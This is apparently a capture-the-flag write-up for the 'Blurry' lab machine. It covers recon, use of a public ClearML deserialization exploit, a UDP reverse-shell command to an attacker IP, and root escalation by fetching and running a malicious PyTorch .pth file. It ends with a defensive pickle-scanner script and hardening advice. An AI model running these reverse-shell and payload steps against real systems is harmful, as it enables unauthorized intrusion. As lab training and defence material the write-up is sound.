recon
$ nmap -A 10.10.11.19
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-13 09:43 UTC
Nmap scan report for 10.10.11.19
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://FUZZ.blurry.htb -fc 301 -t 200
files [Status: 200, Size: 2, Words: 1, Lines: 1, Duration: 83ms]
app [Status: 200, Size: 13327, Words: 382, Lines: 29, Duration: 77ms]
chat [Status: 200, Size: 218733, Words: 12692, Lines: 449, Duration: 94ms]
:: Progress: [19966/19966] :: Job [1/1] :: 179 req/sec :: Duration: [0:00:39] :: Errors: 2 ::
chat
jippity is the admin of the chat.
CVE-2024-24590-ClearML
NIST NVD entry with the description of the CVE:
https://nvd.nist.gov/vuln/detail/CVE-2024-24590
Explanation:
https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
Ready script:
https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit
With this we get access to the account of jippity, the admin of the chat above.
That gives us the user flag.
Establishing shell
To get a usable interactive shell out of this unstable session:
# Listener:
nc -u -lvp 4242
# Victim:
sh -i >& /dev/udp/10.10.14.81/4242 0>&1
# and then
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# press CTRL-Z to background the shell, then:
stty raw -echo; fg
Priv Esc
Running LinEnum gives us:
[+] We can sudo without supplying a password!
Matching Defaults entries for jippity on blurry:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jippity may run the following commands on blurry:
(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
evaluate_model is a Python script that loads these models, runs them and gives each one a score based on its output. It becomes obvious that we need to create a malicious .pth file and run it with this script. Fortunately for us, someone has already written a script that generates .pth files running arbitrary commands:
https://github.com/duck-sec/pytorch-evil-pth
# on host
./evil_pth.py 'cat /root/root.txt >> /models/flag'
http-server
# on victim
wget http://10.10.14.81:8080/evil_model.pth
sudo /usr/bin/evaluate_model /models/evil_model.pth
cat /models/flag
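Both the ClearML issue (CVE-2024-24590) and the evaluate_model escalation rely on the same mechanism: a .pth file is a pickle, and unpickling runs whatever callables the stream names. The scanner below is an added example written for this writeup; it is not from the page, from pytorch-evil-pth or from ClearML. It walks the opcode stream with pickletools without ever unpickling, lists every global the file would import, and flags anything outside an allowlist. The allowlist (torch, collections, numpy), the zip layout with archive/data.pkl, and the constructed sample files are assumptions for the example; tune the allowlist to what your own checkpoints actually reference.

```python
"""Static scan of a PyTorch .pth (or any pickle) for unsafe global references.

Loading a pickle runs whatever callables the stream names.  This scanner uses
pickletools.genops to read the opcodes and never unpickles, so nothing inside
the scanned file executes.  Allowlist and sample inputs are assumptions.
"""
import io
import pickle
import pickletools
import zipfile

# Top-level modules a plain checkpoint is expected to reference (assumption: tune per model).
ALLOWED_TOP_LEVEL = {"torch", "collections", "numpy"}

# Opcodes that push a string onto the unpickler stack.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def pickle_streams(data: bytes):
    """Yield (name, bytes) for each .pkl inside a zip-format .pth, or the raw data itself."""
    buf = io.BytesIO(data)
    if zipfile.is_zipfile(buf):
        with zipfile.ZipFile(buf) as zf:
            for name in zf.namelist():
                if name.endswith(".pkl"):
                    yield name, zf.read(name)
    else:
        yield "<raw>", data


def referenced_globals(stream: bytes) -> list:
    """Return 'module.name' for every global the pickle would import, without executing it.

    GLOBAL carries both names in its argument.  STACK_GLOBAL (protocol 4+) takes them
    from the stack, so we track pushed strings plus the memo (MEMOIZE/PUT/GET); the
    module and name are always pushed or fetched right before STACK_GLOBAL.
    """
    refs, pushed, memo = [], [], {}
    for op, arg, _pos in pickletools.genops(stream):
        name = op.name
        if name == "GLOBAL":
            module, attr = arg.split(" ", 1)
            refs.append(f"{module}.{attr}")
            pushed.append(None)
        elif name == "STACK_GLOBAL":
            if len(pushed) >= 2 and isinstance(pushed[-2], str) and isinstance(pushed[-1], str):
                refs.append(f"{pushed[-2]}.{pushed[-1]}")
            pushed.append(None)
        elif name in STRING_OPS:
            pushed.append(arg)
        elif name == "MEMOIZE":
            memo[len(memo)] = pushed[-1] if pushed else None
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = pushed[-1] if pushed else None
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            pushed.append(memo.get(arg))
        elif name in ("PROTO", "FRAME", "STOP"):
            continue  # no stack effect
        else:
            pushed.append(None)  # any other op: the stack top is no longer a string we care about
    return refs


def scan(data: bytes) -> list:
    """Return '<stream>: module.name' for each global outside ALLOWED_TOP_LEVEL.

    A malformed stream is reported as a finding too: a file that cannot be parsed
    should not be handed to torch.load either.
    """
    findings = []
    for stream_name, stream in pickle_streams(data):
        try:
            refs = referenced_globals(stream)
        except ValueError as exc:
            findings.append(f"{stream_name}: malformed pickle ({exc})")
            continue
        for ref in refs:
            if ref.split(".", 1)[0] not in ALLOWED_TOP_LEVEL:
                findings.append(f"{stream_name}: {ref}")
    return findings


def make_zip_pth(pkl: bytes) -> bytes:
    """Wrap a pickle in the zip layout newer torch.save() uses (constructed sample, not a real checkpoint)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", pkl)
    return buf.getvalue()


def constructed_samples() -> dict:
    """Constructed inputs: a state-dict style pickle, one that names builtins.print, a protocol-0 GLOBAL."""
    return {
        "benign": make_zip_pth(pickle.dumps({"layer.weight": [0.1, 0.2]}, protocol=4)),
        "names_builtin": make_zip_pth(pickle.dumps(print, protocol=4)),  # references a callable, runs nothing here
        "legacy_text": b"cbuiltins\nprint\n.",  # hand-written protocol 0 GLOBAL opcode
    }


if __name__ == "__main__":
    for label, blob in constructed_samples().items():
        print(f"{label}: {scan(blob) or 'no findings'}")
```

Run the scan before a privileged loader touches a file, or add it as the first step of a script like evaluate_model; where the installed torch supports it, `torch.load(path, weights_only=True)` refuses non-tensor globals altogether. The scanner only narrows the problem, though: a sudo rule that lets a low-privileged user point a root-run loader at any file matching /models/*.pth makes write access to /models the real trust boundary, so that directory needs to be writable by root only.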